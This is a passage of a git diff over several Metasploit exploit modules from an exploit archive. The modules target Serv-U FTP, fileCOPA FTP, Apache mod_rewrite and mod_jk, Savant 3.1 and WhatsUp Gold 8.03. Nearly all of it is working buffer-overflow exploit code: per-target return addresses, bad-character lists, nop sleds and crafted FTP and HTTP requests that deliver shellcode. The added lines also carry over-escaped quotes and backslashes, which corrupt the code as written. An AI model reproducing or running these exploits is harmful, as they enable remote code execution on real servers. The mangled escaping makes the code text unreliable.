+						\'Serv-U Uber-Leet Universal ServUDaemon.exe\', # Tested OK - hdm 11/25/2005
 						{
-							'Platform' => 'win',
-							'Ret'      => 0x00401877,
+							\'Platform\' => \'win\',
+							\'Ret\'      => 0x00401877,
 						},
 					],
 					[
-						'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe',
+						\'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe\',
 						{
-							'Platform' => 'win',
-							'Ret'      => 0x0040164d,
+							\'Platform\' => \'win\',
+							\'Ret\'      => 0x0040164d,
 						},
 					],
 					[
-						'Serv-U 5.0.0.0 ServUDaemon.exe',
+						\'Serv-U 5.0.0.0 ServUDaemon.exe\',
 						{
-							'Platform' => 'win',
-							'Ret'      => 0x0040167e,
+							\'Platform\' => \'win\',
+							\'Ret\'      => 0x0040167e,
 						},
 					],
 				],
-			'DisclosureDate' => 'Feb 26 2004',
-			'DefaultTarget' => 0))
+			\'DisclosureDate\' => \'Feb 26 2004\',
+			\'DefaultTarget\' => 0))
 
 		register_advanced_options(
 			[
-				OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]),
-				OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]),
+				OptInt.new(\'SEHOffset\', [ false, \"Offset from beginning of timezone to SEH\", 47 ]),
+				OptInt.new(\'ForceDoubling\', [ false, \"1 to force \\\\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect\", 2 ]),
 			], self.class)
 
 	end
 
 	# From 5.0.0.4 Change Log
-	# "* Fixed bug in MDTM command that potentially caused the daemon to crash."
+	# \"* Fixed bug in MDTM command that potentially caused the daemon to crash.\"
 	#
 	# Nice way to play it down boys
 	#
@@ -101,32 +101,32 @@ class Metasploit3 < Msf::Exploit::Remote
 		disconnect
 
 		case banner
-			when /Serv-U FTP Server v4\.1/
-				print_status('Found version 4.1.0.3, exploitable')
+			when /Serv-U FTP Server v4\\.1/
+				print_status(\'Found version 4.1.0.3, exploitable\')
 				return Exploit::CheckCode::Vulnerable
 
-			when /Serv-U FTP Server v5\.0/
-				print_status('Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!');
+			when /Serv-U FTP Server v5\\.0/
+				print_status(\'Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!\');
 				return Exploit::CheckCode::Appears
 
-			when /Serv-U FTP Server v4\.0/
-				print_status('Found version 4.0.0.4 or 4.1.0.0, additional check.');
-				send_user(datastore['USER'])
-				send_pass(datastore['PASS'])
+			when /Serv-U FTP Server v4\\.0/
+				print_status(\'Found version 4.0.0.4 or 4.1.0.0, additional check.\');
+				send_user(datastore[\'USER\'])
+				send_pass(datastore[\'PASS\'])
 				if (double_ff?())
-					print_status('Found version 4.0.0.4, exploitable');
+					print_status(\'Found version 4.0.0.4, exploitable\');
 					return Exploit::CheckCode::Vulnerable
 				else
-					print_status('Found version 4.1.0.0, exploitable');
+					print_status(\'Found version 4.1.0.0, exploitable\');
 					return Exploit::CheckCode::Vulnerable
 				end
 
 			when /Serv-U FTP Server/
-				print_status('Found an unknown version, try it!');
+				print_status(\'Found an unknown version, try it!\');
 				return Exploit::CheckCode::Detected
 
 			else
-				print_status('We could not recognize the server banner')
+				print_status(\'We could not recognize the server banner\')
 				return Exploit::CheckCode::Safe
 		end
 
@@ -137,23 +137,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		connect_login
 
-		print_status("Trying target #{target.name}...")
+		print_status(\"Trying target #{target.name}...\")
 
-		# Should have paid more attention to skylined's exploit, only after figuring
-		# out how my payloads were getting transformed did I remember seeing \xff
+		# Should have paid more attention to skylined\'s exploit, only after figuring
+		# out how my payloads were getting transformed did I remember seeing \\xff
 		# doubling in his CHMOD exploit, arg!
 		shellcode = payload.encoded
 
-		case datastore['ForceDoubling']
+		case datastore[\'ForceDoubling\']
 			when 1
-				print_status("Forced doubling of all \\xff sequences in the encoded payload")
-				shellcode.gsub!(/\xff/, "\xff\xff")
+				print_status(\"Forced doubling of all \\\\xff sequences in the encoded payload\")
+				shellcode.gsub!(/\\xff/, \"\\xff\\xff\")
 			when 0
-				print_status("Forced doubling has been disabled")
+				print_status(\"Forced doubling has been disabled\")
 			when 2
 				if (double_ff?())
-					print_status("Forced doubling enabled after detection of version 4.0.0.4")
-					shellcode.gsub!(/\xff/, "\xff\xff")
+					print_status(\"Forced doubling enabled after detection of version 4.0.0.4\")
+					shellcode.gsub!(/\\xff/, \"\\xff\\xff\")
 				end
 		end
 
@@ -161,21 +161,21 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Since we got here via a pop pop ret, we can just the address of the jmp
 		# off the stack, add esp, BYTE -4 ; pop edi
 
-		search_rtag = "\x34\x33\x32\x31" # +1 / 0 / -1 [start, end, stored]
+		search_rtag = \"\\x34\\x33\\x32\\x31\" # +1 / 0 / -1 [start, end, stored]
 		search_stub = Rex::Arch::X86.searcher(search_rtag)
-		search_code = "\x83\xc4\xfc\x5f" + search_stub + 'BB'
-		if (datastore['SEHOffset'] < search_code.length)
-			print_error("Not enough room for search code, adjust SEHOffset")
+		search_code = \"\\x83\\xc4\\xfc\\x5f\" + search_stub + \'BB\'
+		if (datastore[\'SEHOffset\'] < search_code.length)
+			print_error(\"Not enough room for search code, adjust SEHOffset\")
 			return
 		end
 
-		jump_back = Rex::Arch::X86.jmp_short('$+' + (-1 * search_code.length).to_s) + 'BB'
+		jump_back = Rex::Arch::X86.jmp_short(\'$+\' + (-1 * search_code.length).to_s) + \'BB\'
 
-		buf = 'MDTM 20031111111111+' + ('A' * (datastore['SEHOffset'] - search_code.length))
+		buf = \'MDTM 20031111111111+\' + (\'A\' * (datastore[\'SEHOffset\'] - search_code.length))
 		buf << search_code
 		buf << jump_back
-		buf << [target.ret].pack('V')
-		buf << ' /'
+		buf << [target.ret].pack(\'V\')
+		buf << \' /\'
 		buf << Rex::Arch::X86.dword_adjust(search_rtag, 1)
 		buf << shellcode
 		buf << search_rtag
@@ -187,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def double_ff?
-		res = send_cmd( ['P@SW'], true )
+		res = send_cmd( [\'P@SW\'], true )
 		return (res and res =~ /^500/) ? true : false
 	end
 
diff --git a/platforms/windows/remote/16733.rb b/platforms/windows/remote/16733.rb
index f2baa367e..2313aa679 100755
--- a/platforms/windows/remote/16733.rb
+++ b/platforms/windows/remote/16733.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,49 +18,49 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
-			'Description'    => %q{
+			\'Name\'           => \'FileCopa FTP Server pre 18 Jul Version\',
+			\'Description\'    => %q{
 					This module exploits the buffer overflow found in the LIST command
 				in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
 			},
-			'Author'         => [ 'Jacopo Cervini' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9179 $',
-			'References'     =>
+			\'Author\'         => [ \'Jacopo Cervini\' ],
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: 9179 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2006-3726' ],
-					[ 'OSVDB', '27389' ],
-					[ 'BID', '19065' ],
+					[ \'CVE\', \'2006-3726\' ],
+					[ \'OSVDB\', \'27389\' ],
+					[ \'BID\', \'19065\' ],
 				],
-			'Privileged'     => true,
-			'Payload'        =>
+			\'Privileged\'     => true,
+			\'Payload\'        =>
 				{
-					'Space'    => 400,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-					'StackAdjustment' => -3500,
+					\'Space\'    => 400,
+					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",
+					\'StackAdjustment\' => -3500,
 				},
-			'Platform' => 'win',
+			\'Platform\' => \'win\',
 
-			'Targets'        =>
+			\'Targets\'        =>
 				[
-					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
-					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
+					[ \'Windows 2k Server SP4 English\',   { \'Ret\' => 0x7c2e7993, \'Nops\' => 160 } ], # jmp esp
+					[ \'Windows XP Pro SP2 Italian\',      { \'Ret\' => 0x77f62740, \'Nops\' => 240 } ]  # jmp esp
 				],
-			'DisclosureDate' => 'Jul 19 2006',
-			'DefaultTarget' => 0))
+			\'DisclosureDate\' => \'Jul 19 2006\',
+			\'DefaultTarget\' => 0))
 	end
 
 
 	def exploit
 		connect_login
 
-		print_status("Trying target #{target.name}...")
+		print_status(\"Trying target #{target.name}...\")
 
-		sploit =  "A "
-		sploit << make_nops(target['Nops'])
-		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded
+		sploit =  \"A \"
+		sploit << make_nops(target[\'Nops\'])
+		sploit << [target.ret].pack(\'V\') + make_nops(4) + \"\\x66\\x81\\xc1\\xa0\\x01\\x51\\xc3\" + make_nops(189) + payload.encoded
 
-		send_cmd( ['LIST', sploit] , false)
+		send_cmd( [\'LIST\', sploit] , false)
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/16752.rb b/platforms/windows/remote/16752.rb
index cbc47f3be..25a33591b 100755
--- a/platforms/windows/remote/16752.rb
+++ b/platforms/windows/remote/16752.rb
@@ -10,7 +10,7 @@
 ##
 
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -19,62 +19,62 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Apache module mod_rewrite LDAP protocol Buffer Overflow\',
+			\'Description\'    => %q{
 				This module exploits the mod_rewrite LDAP protocol scheme handling
 				flaw discovered by Mark Dowd, which produces an off-by-one overflow.
 				Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
 				This module requires REWRITEPATH to be set accurately. In addition,
-				the target must have 'RewriteEngine on' configured, with a specific
-				'RewriteRule' condition enabled to allow for exploitation.
+				the target must have \'RewriteEngine on\' configured, with a specific
+				\'RewriteRule\' condition enabled to allow for exploitation.
 
 				The flaw affects multiple platforms, however this module currently
 				only supports Windows based installations.
 			},
-			'Author'         => 'patrick',
-			'Version'        => '$Revision: 8498 $',
-			'References'     =>
+			\'Author\'         => \'patrick\',
+			\'Version\'        => \'$Revision: 8498 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2006-3747' ],
-					[ 'OSVDB', '27588' ],
-					[ 'BID', '19204' ],
-					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
+					[ \'CVE\', \'2006-3747\' ],
+					[ \'OSVDB\', \'27588\' ],
+					[ \'BID\', \'19204\' ],
+					[ \'URL\', \'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html\' ],
+					[ \'URL\', \'http://www.milw0rm.com/exploits/3680\' ],
+					[ \'URL\', \'http://www.milw0rm.com/exploits/3996\' ],
+					[ \'URL\', \'http://www.milw0rm.com/exploits/2237\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Privileged'     => true,
-			'Platform'       => ['win'], # 'linux'],
-			'Payload'        =>
+			\'Privileged\'     => true,
+			\'Platform\'       => [\'win\'], # \'linux\'],
+			\'Payload\'        =>
 				{
-					'Space'    => 636,
-					'BadChars' => "\x00\x0a\x0d\x20",
-					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
-					'StackAdjustment' => -3500,
-					'DisableNops'  =>  'True',
+					\'Space\'    => 636,
+					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\",
+					\'EncoderType\' => Msf::Encoder::Type::AlphanumUpper,
+					\'StackAdjustment\' => -3500,
+					\'DisableNops\'  =>  \'True\',
 				},
-			'Targets'        =>
+			\'Targets\'        =>
 				[
-					[  'Automatic', {} ], # patrickw tested OK 20090310 win32
+					[  \'Automatic\', {} ], # patrickw tested OK 20090310 win32
 				],
-			'DisclosureDate' => 'Jul 28 2006',
-			'DefaultTarget'  => 0))
+			\'DisclosureDate\' => \'Jul 28 2006\',
+			\'DefaultTarget\'  => 0))
 
 			register_options(
 				[
-					OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
+					OptString.new(\'REWRITEPATH\', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]),
 				], self.class)
 	end
 
 
 	def check
 		res = send_request_raw({
-			'uri'     => '/',
-			'version' => '1.1',
+			\'uri\'     => \'/\',
+			\'version\' => \'1.1\',
 		}, 2)
 
 		if (res.to_s =~ /Apache/) # This could be smarter.
@@ -89,12 +89,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		# On Linux Apache, it is possible to overwrite EIP by
 		# sending ldap:// ... TODO patrickw
 
-		trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
+		trigger = \'/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\'
 
-		print_status("Sending payload.")
+		print_status(\"Sending payload.\")
 		send_request_raw({
-				'uri'     => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,
-				'version' => '1.0',
+				\'uri\'     => \'/\' + datastore[\'REWRITEPATH\'] + trigger + payload.encoded,
+				\'version\' => \'1.0\',
 				}, 2)
 		handler
 	end
diff --git a/platforms/windows/remote/16770.rb b/platforms/windows/remote/16770.rb
index bdeeaabcd..38500e4a5 100755
--- a/platforms/windows/remote/16770.rb
+++ b/platforms/windows/remote/16770.rb
@@ -9,71 +9,71 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
 
-	HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }
+	HttpFingerprint = { :pattern => [ /Savant\\/3\\.1/ ] }
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'        => 'Savant 3.1 Web Server Overflow',
-			'Description' => %q{
+			\'Name\'        => \'Savant 3.1 Web Server Overflow\',
+			\'Description\' => %q{
 					This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
 				supports a maximum of 10 threads (for a default install). Each exploit attempt
 				generally causes a thread to die whether sucessful or not. Therefore, in a default
 				configuration, you only have 10 chances.
 
 				Due to the limited space available for the payload in this exploit module, use of the
-				"ord" payloads is recommended.
+				\"ord\" payloads is recommended.
 			},
-			'Author'      => [ 'patrick' ],
-			'Arch'		  => [ ARCH_X86 ],
-			'License'     => MSF_LICENSE,
-			'Version'     => '$Revision: 10546 $',
-			'References'  =>
+			\'Author\'      => [ \'patrick\' ],
+			\'Arch\'		  => [ ARCH_X86 ],
+			\'License\'     => MSF_LICENSE,
+			\'Version\'     => \'$Revision: 10546 $\',
+			\'References\'  =>
 				[
-					[ 'CVE', '2002-1120' ],
-					[ 'OSVDB', '9829' ],
-					[ 'BID', '5686' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/787' ],
+					[ \'CVE\', \'2002-1120\' ],
+					[ \'OSVDB\', \'9829\' ],
+					[ \'BID\', \'5686\' ],
+					[ \'URL\', \'http://www.milw0rm.com/exploits/787\' ],
 				],
-			'Privileged'  => false,
-			'DefaultOptions' =>
+			\'Privileged\'  => false,
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Payload'	  =>
+			\'Payload\'	  =>
 				{
-					'Space'			   => 253,
-					'BadChars'        => "\x00\x0a\x0d\x25",
-					'StackAdjustment' => -3500,
-					'Compat'          =>
+					\'Space\'			   => 253,
+					\'BadChars\'        => \"\\x00\\x0a\\x0d\\x25\",
+					\'StackAdjustment\' => -3500,
+					\'Compat\'          =>
 						{
-							'ConnectionType' => '+ws2ord',
+							\'ConnectionType\' => \'+ws2ord\',
 						},
 				},
-			'Platform'    => ['win'],
-			'Targets'     =>
+			\'Platform\'    => [\'win\'],
+			\'Targets\'     =>
 				[
 					# Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
-					[ 'Universal Savant.exe', 	    { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
-					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
-					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
-					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
-					[ 'Windows XP Pro SP2 - English',   { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
+					[ \'Universal Savant.exe\', 	    { \'Ret\' => 0x00417a96 } ], # p/r Savant.exe
+					[ \'Windows 2000 Pro All - English\', { \'Ret\' => 0x750211aa } ], # p/r ws2help.dll
+					[ \'Windows 2000 Pro All - Italian\', { \'Ret\' => 0x74fd2ac5 } ], # p/r ws2help.dll
+					[ \'Windows 2000 Pro All - French\',  { \'Ret\' => 0x74fa36b2 } ], # p/r ws2help.dll
+					[ \'Windows XP Pro SP2 - English\',   { \'Ret\' => 0x71ab76ed } ], # p/r ws2help.dll
 				],
-			'DisclosureDate' => 'Sep 10 2002',
-			'DefaultTarget' => 0))
+			\'DisclosureDate\' => \'Sep 10 2002\',
+			\'DefaultTarget\' => 0))
 	end
 
 	def check
 		info = http_fingerprint  # check method
-		if info and (info =~ /Savant\/3\.1/)
+		if info and (info =~ /Savant\\/3\\.1/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		Exploit::CheckCode::Safe
@@ -82,17 +82,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def safe_nops(count)
 		# We need to find a safe nop combination.
-		# Savant will change some chars in the http method type - anything before the "/".
+		# Savant will change some chars in the http method type - anything before the \"/\".
 		#
-		# For example, "GET /" will remain "GET /", however
-		# "\xe0 /" will be modified to "\xc0 /" ...
-		# "\xfe /" will be modified to "\xde /" ...
-		# "\xff /" will be modified to "\x9f /"
-		# The code after the "/" - our payload - is unchanged >=)
+		# For example, \"GET /\" will remain \"GET /\", however
+		# \"\\xe0 /\" will be modified to \"\\xc0 /\" ...
+		# \"\\xfe /\" will be modified to \"\\xde /\" ...
+		# \"\\xff /\" will be modified to \"\\x9f /\"
+		# The code after the \"/\" - our payload - is unchanged >=)
 		#
 		# Savant bad_chars for the nops
 
-		bad_nop_chars = [*(0xe0..0xff)].pack("C*")
+		bad_nop_chars = [*(0xe0..0xff)].pack(\"C*\")
 
 		nopsled = make_nops(count) # make_nops includes the payload bad_chars
 			bad_nop_chars.each_byte { |badbyte|
@@ -107,21 +107,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exploit
-		print_status("Searching for a suitable nopsled...")
+		print_status(\"Searching for a suitable nopsled...\")
 		findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
 		until findnop
 			findnop = safe_nops(24) # If nops are banned, generate a new batch.
 		end
 
-		print_status("Found one! Sending exploit.")
-		sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
+		print_status(\"Found one! Sending exploit.\")
+		sploit = findnop + \" /\" + payload.encoded + [target[\'Ret\']].pack(\'V\')
 		res = send_request_raw(
 			{
-				'method'  => sploit,
-				'uri'     => '/'
+				\'method\'  => sploit,
+				\'uri\'     => \'/\'
 			}, 5)
 		if (res)
-			print_error('The server responded, that can\'t be good.')
+			print_error(\'The server responded, that can\\\'t be good.\')
 		end
 
 		handler
diff --git a/platforms/windows/remote/16787.rb b/platforms/windows/remote/16787.rb
index 37d065a59..1e1518dba 100755
--- a/platforms/windows/remote/16787.rb
+++ b/platforms/windows/remote/16787.rb
@@ -9,57 +9,57 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
 
-	# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" )
+	# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm=\"WhatsUp Gold\" )
 	HttpFingerprint = { :pattern => [ /WhatsUp/ ] }
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Ipswitch WhatsUp Gold 8.03 Buffer Overflow\',
+			\'Description\'    => %q{
 					This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
-				posting a long string for the value of 'instancename' in the _maincfgret.cgi
+				posting a long string for the value of \'instancename\' in the _maincfgret.cgi
 				script an attacker can overflow a buffer and execute arbitrary code on the system.
 			},
-			'Author'         => [ 'MC' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9820 $',
-			'References'     =>
+			\'Author\'         => [ \'MC\' ],
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: 9820 $\',
+			\'References\'     =>
 				[
-					['CVE', '2004-0798'],
-					['OSVDB', '9177'],
-					['BID', '11043'],
+					[\'CVE\', \'2004-0798\'],
+					[\'OSVDB\', \'9177\'],
+					[\'BID\', \'11043\'],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Privileged'     => true,
-			'Payload'        =>
+			\'Privileged\'     => true,
+			\'Payload\'        =>
 				{
-					'Space'    => 500,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
+					\'Space\'    => 500,
+					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",
+					\'PrependEncoder\' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
+					[ \'WhatsUP Gold 8.03 Universal\', { \'Ret\' => 0x6032e743 } ], # whatsup.dll
 				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Aug 25 2004'))
+			\'DefaultTarget\'  => 0,
+			\'DisclosureDate\' => \'Aug 25 2004\'))
 
 		register_options(
 			[
 				Opt::RPORT(80),
-				OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']),
-				OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']),
+				OptString.new(\'HTTPUSER\', [ false, \'The username to authenticate as\', \'admin\']),
+				OptString.new(\'HTTPPASS\', [ false, \'The password to authenticate as\', \'admin\']),
 			], self.class )
 	end
 
@@ -67,22 +67,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		c = connect
 
 		num = rand(65535).to_s
-		user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
+		user_pass = \"#{datastore[\'HTTPUSER\']}\" + \":\" + \"#{datastore[\'HTTPPASS\']}\"
 
-		req   = "page=notify&origname=&action=return&type=Beeper&instancename="
-		req  << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
-		req  << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
-		req  << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
+		req   = \"page=notify&origname=&action=return&type=Beeper&instancename=\"
+		req  << rand_text_alpha_upper(811, payload_badchars) + \"\\xeb\\x06\"
+		req  << make_nops(2) + [target.ret].pack(\'V\') + make_nops(10) + payload.encoded
+		req  << \"&beepernumber=&upcode=\" + num + \"*&downcode=\"+ num + \"*&trapcode=\" + num + \"*&end=end\"
 
-		print_status("Trying target %s..." % target.name)
+		print_status(\"Trying target %s...\" % target.name)
 		res = send_request_cgi({
-			'uri'          => '/_maincfgret.cgi',
-			'method'       => 'POST',
-			'content-type' => 'application/x-www-form-urlencoded',
-			'data'         => req,
-			'headers'      =>
+			\'uri\'          => \'/_maincfgret.cgi\',
+			\'method\'       => \'POST\',
+			\'content-type\' => \'application/x-www-form-urlencoded\',
+			\'data\'         => req,
+			\'headers\'      =>
 			{
-				'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
+				\'Authorization\' => \"Basic #{Rex::Text.encode_base64(user_pass)}\"
 			}
 		}, 5)
 
diff --git a/platforms/windows/remote/16798.rb b/platforms/windows/remote/16798.rb
index 1e5f4cfc0..d0e19b2bf 100755
--- a/platforms/windows/remote/16798.rb
+++ b/platforms/windows/remote/16798.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -19,40 +19,40 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Apache mod_jk 1.2.20 Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Apache mod_jk 1.2.20 Buffer Overflow\',
+			\'Description\'    => %q{
 					This is a stack buffer overflow exploit for mod_jk 1.2.20.
 				Should work on any Win32 OS.
 			},
-			'Author'         => 'Nicob ',
-			'Version'        => '$Revision: 9929 $',
-			'License'        => MSF_LICENSE,
-			'References'     =>
+			\'Author\'         => \'Nicob \',
+			\'Version\'        => \'$Revision: 9929 $\',
+			\'License\'        => MSF_LICENSE,
+			\'References\'     =>
 				[
-					[ 'CVE', '2007-0774' ],
-					[ 'OSVDB', '33855' ],
-					[ 'BID', '22791' ],
-					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-008.html' ]
+					[ \'CVE\', \'2007-0774\' ],
+					[ \'OSVDB\', \'33855\' ],
+					[ \'BID\', \'22791\' ],
+					[ \'URL\', \'http://www.zerodayinitiative.com/advisories/ZDI-07-008.html\' ]
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'process',
+					\'EXITFUNC\' => \'process\',
 				},
-			'Privileged'     => true,
-			'Payload'        =>
+			\'Privileged\'     => true,
+			\'Payload\'        =>
 				{
-					'Space'    => 4000,
-					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c",
-					'DisableNops' => true
+					\'Space\'    => 4000,
+					\'BadChars\' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x23\\x25\\x26\\x2f\\x3b\\x3f\\x5c\",
+					\'DisableNops\' => true
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
 					# POP/POP/RET in mod_jk 1.2.20 (Apache 1.3.37, 2.0.58 and 2.2.3)
-					['mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)', { 'Ret' => 0x6a6b8ef1 }],
+					[\'mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)\', { \'Ret\' => 0x6a6b8ef1 }],
 				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Mar 02 2007'))
+			\'DefaultTarget\'  => 0,
+			\'DisclosureDate\' => \'Mar 02 2007\'))
 
 		register_options(
 			[
@@ -63,12 +63,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		connect
 
-		sock.put("GET / HTTP/1.0\r\n\r\n")
+		sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")
 		resp = sock.get_once
 		disconnect
 
-			if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1.2.20/))) then
-				print_status("Apache version detected : #{m[1]}")
+			if (resp and (m = resp.match(/Server: Apache\\/(.*) \\(Win32\\)(.*) mod_jk\\/1.2.20/))) then
+				print_status(\"Apache version detected : #{m[1]}\")
 				return Exploit::CheckCode::Appears
 			else
 				return Exploit::CheckCode::Safe
@@ -78,8 +78,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
-		uri_start  = "GET /"
-		uri_end    = ".html HTTP/1.0\r\n\r\n"
+		uri_start  = \"GET /\"
+		uri_end    = \".html HTTP/1.0\\r\\n\\r\\n\"
 		sc_base    = 16
 
 		shellcode  = payload.encoded
@@ -91,17 +91,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		# 4423 : Apache/2.2.3  (Win32) mod_jk/1.2.20
 
 		[ 4343, 4407, 4423 ].each { |seh_offset|
-			sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
